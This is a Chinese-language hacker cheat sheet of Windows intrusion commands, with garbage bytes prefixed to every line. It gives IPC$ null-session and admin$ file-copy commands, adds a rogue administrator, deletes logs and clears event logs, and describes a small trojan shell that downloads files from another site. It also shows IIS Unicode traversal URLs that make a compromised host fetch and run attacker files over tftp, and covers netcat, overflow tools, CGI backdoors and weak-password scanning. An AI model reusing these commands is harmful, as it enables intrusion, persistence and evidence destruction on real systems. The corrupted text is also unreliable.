网管和黑客都必须知道的命令
V�CYwz�B 常用的几条NET命令:
KA�5��v�+~ �39�c2pV�[ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�'Jt�B�ZFq `K"L /��I9 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
u$��z`��
� ��q�fF~D0} (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
AhN�4m��c@ A�.F%Y�c�q (查看远程主机时间) net time \\IP地址
�Lpky�oh v P.�se�'z)E (定时启动某个程序) at \\IP地址 02:18 readme.exe
i%iL[id:w� �2F;y�;l�% (查看共享) net view \\IP地址
F-Qzrqu�S� _{ue8�k�Gt (查看netbios工作组列表) nbtstat -A IP地址
�2�g�
��`o Ha#=���(9. (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
c?Y��*Y� � 2YL?�,uL�S (这两条把自己增加到管理员组): net user 用户名 密码 /add
�>�-?f0�K !�vi>�U|rh net localgroup Administrators 用户名 /add
J6"9v;��V t|�?ez4/{z (断开连接) net use \\IP地址\ipc$ /delete
�A�F{�\6<m $�GV7o{"& 扫尾:
C�l�.x�'�v OG~gFZr)�6 del C:\winnt\system32\logfiles\*.*
UBKu�/@[f@ wVXS%4|�v� del C:\winnt\ssytem32\config\*.evt
";lVa'H�MZ ��Rr$-tYy6 del C:\winnt\system32\dtclog\*.*
�C.�:<-xo
x^q�Vw5{n del C:\winnt\system32\*.log
of~�4Q{f$6 CZe �]kXNv del C:\winnt\system32\*.txt
ZgJQ?�S$�D � �'c&��Ed del C:\winnt\*.txt
���qx(xvU9 �h8j�.��( del C:\winnt\*.log
UXz<�)RvB �T~?Ff|qFC 一、netsvc.exe
�udH7}K� v ^#�-l
q) � 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�~D+�bh��~ `RT>}_���j netsvc /list \\IP地址
�G>�_*djUf mU���C)gA/ netsvc schedule \\IP地址 /query
%`r�$g[<G� + J�{IRyBc netsvc \\IP地址 schedule /start
k}C�VQ@nd ja'�T�+!�k 二、OpenTelnet.exe
\w>y`�\6mX �t��T8%yG} 远程启动主机的Telnet服务,并绑定端口到7878,例如:
Kn{4;X��k\ X0�5�/uX{ OpenTelnet \\IP地址 用户名 密码 1 7878
�@7c?xQVd$ o[4}h:> dq 然后就可以telnet到主机的7878端口,进入DOS方式下:
s��[*r�zoA O�DN�/G%l� telnet IP地址 7878
e]aDP�1n3t ;d$��rdFA_ 三、winshell.exe
��+E+�p"7 � d�Fc':�| 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�?�81c �4w 0�auYG><�= p Path (查看winshell主程序的路径信息)
GA�)`�-*.R �u�ZYF(�Yu b reBoot (重新启动机器)
a��!��S�iX ��2.y-48Nz d shutDown (关闭机器)
�R^�fPIv`q jd"@t��*ZV s Shell (执行后你就会看到可爱的“C:\>”)
L{\8�!�51L T<>,lQs(�a x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�(E�3b\lST B �mb0cF�Q CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�fb�vL7*
(
8�W7J3�{d 四、3389登陆器,GUI方式登录远程主机的
V�GN5<?PrN ��>�|�=t�s 五、elsave.exe
���.V<+v-h (,2��S�X�V 事件日志清除工具
I
�34>X`[o gJ+'W1��$/ elsave -s \\IP地址 -l "application" -C
Rv>-4�@fMJ �d1���T!+I elsave -s \\IP地址 -l "system" -C
?j.�,Nw4FC A�TyEf5Id_ elsave -s \\IP地址 -l "security" -C
IP���p�N@� +�`0k Fbx� 执行后成功清除应用程序日志,系统日志,安全日志
>'�$Mp���< .��E�fk��* 六、hbulot.exe
�>:!5�*E5? y^�*~B(T{ 开启win2kserver和winxp的3389服务
.���{^5X)
�re�<{
>�� hbulot [/r]
��g��J{)-\ @H�C�Vmg�: 使用/r表示安装完成后自动重起目标使设置生效。
�%��1�L,Y Zx@a/jLO[n 七、nc.exe(netcat.exe)
n�@�i HFBb =�qIp2c}Rx 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
X?��',�n
1 �����_[3�D 想要连接到某处: nc [-options] hostname port[s] [ports] ...
w�9i�mKVry x��o&_bM�O 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�=WAT�yY:s 6 "�sSo�j� 参数:
'�<<t]kK[N N�I]N4[8( -e prog 程序重定向,一旦连接,就执行 [危险!!]
�
(�ZizuHC zw[m�9N5\h -g gateway source-routing hop point[s], up to 8
AT3Mlz~7#� �p6@)-2�^ -G num source-routing pointer: 4, 8, 12, ...
%> ei�AB_b F�xz"DZY6 -h 帮助信息
�t�*�u:hex k�evrsV]/$ -i secs 延时的间隔
0�~S^�Y1hH � ��kJ�}`V -l 监听模式,用于入站连接
CT�a�57R�� 4HlQ&�2O%# -n 指定数字的IP地址,不能用hostname
D@.6>:;il� TJRCH>E�[a -o file 记录16进制的传输
t{96p77)= `;C � V=,M -p port 本地端口号
uXv��t�fc� /4Gt{yg�Sr -r 任意指定本地及远程端口
m_]Y{�3C�
.q>i�X�E_c -s addr 本地源地址
&8lZNv8;(p ��T~e�.�PP -u UDP模式
��GTd�,n=� N6:`/f+A>T -v 详细输出——用两个-v可得到更详细的内容
l��f�,�5w� �k,*XG$�2h -w secs timeout的时间
�k�(HUUH_z 7@Q�cc t4A -z 将输入输出关掉——用于扫描时
4WB�0P�t{� 八、TFTPD32.EXE
{IjR�^J=�k �<P�_-s*b� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�]f_p�8?j" �5H�^�(2�w http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
!a\�^S�k
/ gbA_D��Z� 然后可以直接令文件运行:
�[�/r(__. W>�r+h-kR http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
Pq$n5fZC�! e�0 ec�D3� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
|G<|�F`C�j h��?U
O&(� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�R;�LP�:,) $`8wJ�f9@w 一、一 Xscan命令行运行参数说明:
D�E���gXQ[ �AbM'3Mk�z 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
<P<z N~i9j ���fz�_r7? 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
2\��$��o�V 53����h0UL xscan -file <主机列表文件名> <检测项目> [其他选项]
!4!~L�k=� \;Weiz��q5 其中<检测项目> 含义如下:
L�~3Pm%{@A �]:n,R�O6� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�p#tI;"\y �"d�lV��k~ -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
zbiL�P8��3 DmcZ�ta8n] -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
xIn:Z�KJ' ar,7S&s��H -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�~Tt�iO#,t i
XN1I�� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
-?a 26o%�e ��k?}�Zg*� [其他选项] 含义如下:
=���(^3}x
2g<�Xtt7+o -v: 显示详细扫描进度
HaYo�!.(Fv >Q*�W��i�� -p: 跳过Ping不通的主机
F'Z,]b'st3 )��/P}?`�I -o: 跳过没有检测到开放端口的主机
�CC`J�Z.SO ��$�cg�cX� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
